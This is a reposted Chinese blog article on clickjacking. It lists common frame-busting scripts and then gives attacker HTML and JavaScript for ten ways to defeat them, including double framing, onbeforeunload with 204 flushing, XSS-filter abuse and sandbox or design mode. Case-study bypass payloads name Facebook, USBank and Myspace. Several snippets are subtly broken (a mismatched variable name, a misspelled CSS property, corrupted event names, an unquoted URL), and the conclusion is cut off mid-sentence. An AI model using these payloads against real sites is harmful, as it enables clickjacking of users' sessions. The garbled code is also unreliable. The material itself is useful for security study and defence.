Busting Frame Busting
生活随笔
收集整理的這篇文章主要介紹了
Busting Frame Busting
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
在進行Busting Frame Busting之前,先列舉一些常用的Frame Busting? code:
if (top != self)
if (top.location != self.location)
if (top.location != location)
if (parent.frames.length > 0)
if (window != top)
if (window.top !== window.self)
if (window.self != window.top)
if (parent && parent != window)
if (parent && parent.frames && parent.frames.length>0)
if((self.parent&&!(self.parent===self))&&(self.parent.frames.length!=0))
+
top.location = self.location
top.location.href = document.location.href
top.location.href = self.location.href
top.location.replace(self.location)
top.location.href = window.location.href
top.location.replace(document.location)
top.location.href = window.location.href
top.location.href = "URL"
document.write()
top.location = location
top.location.replace(document.location)
top.location.replace(URL)
top.location.href = document.location
top.location.replace(window.location.href)
top.location.href = location.href
self.parent.location = document.location
parent.location.href = self.document.location
top.location.href = self.location
top.location = window.location
top.location.replace(window.location.pathname)
window.top.location = window.self.location
setTimeout(function(){document.body.innerHTML=;},1);
window.self.onload = function(evt){document.body.innerHTML=;}
var url = window.location.href; top.location.replace(url)
知道了一些常用的Frame Busting ,下面開始介紹如何進行Busting Frame Busting。
十種常見的Busting Frame Busting
1 Double framing
Victim frame busting code:
if(top.location!=self.location){
parent.location=self.location;
}
Attacker top frame:
<iframe src="attacker2.html">
Attacker sub-frame:
<iframe src="http://www.victim.com">
2 The onBeforeUnload event
<script>
window.οnbefοreunlοad=function()
{
return"Asking the user nicely";
}
</script>
<iframesrc="http://www.paypal.com">
3 onBeforeUnload ---204 Flushing
var prevent_bust=0
window.οnbefοreunlοad=
function(){kill_bust++}
setInterval(function(){
if(kill_bust>0){
kill_bust-=2;
window.top.location=
http://no-content-204.com
}
},1);
<iframe src="http://www.victim.com">
4 Exploiting the XSS filter
IE8:
Example. Victim frame busting code:
<script>
if(top!=self){
top.location=self.location;
}
</script>
Attacker:
<iframe src="http://www.victim.com/?v=<script>if>
Google Chrome:
Example. victim frame busting code:
if(top!=self){
top.location=self.location;
}
Attacker:
<iframe src="http://www.victim.com/?v=if(top+!%3D+self)+%7B+top.location%3Dself.location%3B+%7D">
5 Referrer checking problems
Consider the following code from a large retailer:
if(top.location!=location){
if(document.referrer&&document.referrer.indexOf("walmart.com")==-1)
{
top.location.replace(document.location.href);
}
}
This page can be framed by an attacker who controls a domain walmart.com.badgy.com.
6 Clobbering top.location
IE7.
Victim frame busting code:
if(top.location!=self.location){
top.location=self.location;
}
Attacker:
<script>var location="clobbered";</script>
<iframe src="http://www.victim.com">
7 IE Restricted Zone
Attacker:
<iframe src="http://www.victim.com" security="restricted"></iframe>
8 Sandbox attribute
This feature can be used to disable JavaScript in the same way as the restricted zone; however, because cookies are delivered in the subframe, clickjacking attacks can take advantage of existing sessions that the user has established.
9 Design mode
Stone [Next generation clickjacking] showed that design mode can be turned on in the framing page (via document.designMode), disabling JavaScript in top and sub-frame. Again, cookies are delivered to the sub-frame. Design mode is currently implemented in Firefox and IE8.
10 Mobile Sites
Unfortunately, most sites who framebust on their primary domain do not framebust their mobile sites.To make matters worse, many sites do not dierentiate sessions between the regular and the mobile site; that is, if you are logged in at www.example.com you are also logged in at mobile.example.com. This enables the attacker to clickjack the mobile site (on a desktop browser) and gain control of a fully functional site.
實際網絡環境中,Busting Frame Busting將會較為復雜。
1 Facebook.com ---Shedding a Ray of Light in the
Darkness
frame-busting code:
if(top!=self){
window.document.write("<div style=
background:black;opacity:0.5;
filter:alpha(opacity=50);
position:absolute;top:0px;left:0px;
width:9999px;height:9999px;
z-index:1000001
onClick=top.location.href=window.location.href>
</div>");
}
Busting Frame Busting:
<body style="overflo-x:hidden; border:0px; margin:0px;">
<iframe width="21800px" height="2500px" src="http://facebook.com/" frameborder="0" marginheight="0" marginwidth="0"></iframe>
<script>window.scrollTo(10200,0);</script>
2 www.USBank.com----Domain checking errors
frame-busting code:
if(self!=top){
var dom=getDom(document.referrer);
var okDom=/usbank|localhost|usbnet/;?
var matchDomain=dom.search(okDom);
if(matchDomain==-1){//bust}
(www.husbanken.no ,http://www.rusbank.org)will be allowed to frame the page since both contain the string usbank in the domain.
3 Myspace.com----Trust problems
frame-busting code:
try{
A=!top.location.href
}catch(B){}
A=A&&!(document.referrer.match(
/^https?://[-a-z0-9.]*.google.(co.
|com.)?[a-z]+/imgres/i))
&&!(document.referrer.match(
/^https?://([^/]*.)?(myspace.com
|myspace.cn
|simsidekick.com
|levisawards.com//i));
if(A){//framebust}
By design the code allows Myspace to be framed by Google images.Google images, however,does not use frame busting.
an attacker can frame Google images and then cause Google images to frame Myspace (e.g. by issuing a speci c Google search query that leads to a Myspace page)
如何防御,如何突破,在上面的描述中都已經看到了。現在給出目前防御性最
總結
以上是生活随笔為你收集整理的Busting Frame Busting的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: java 计算农历_java计算农历日期
- 下一篇: 口语积累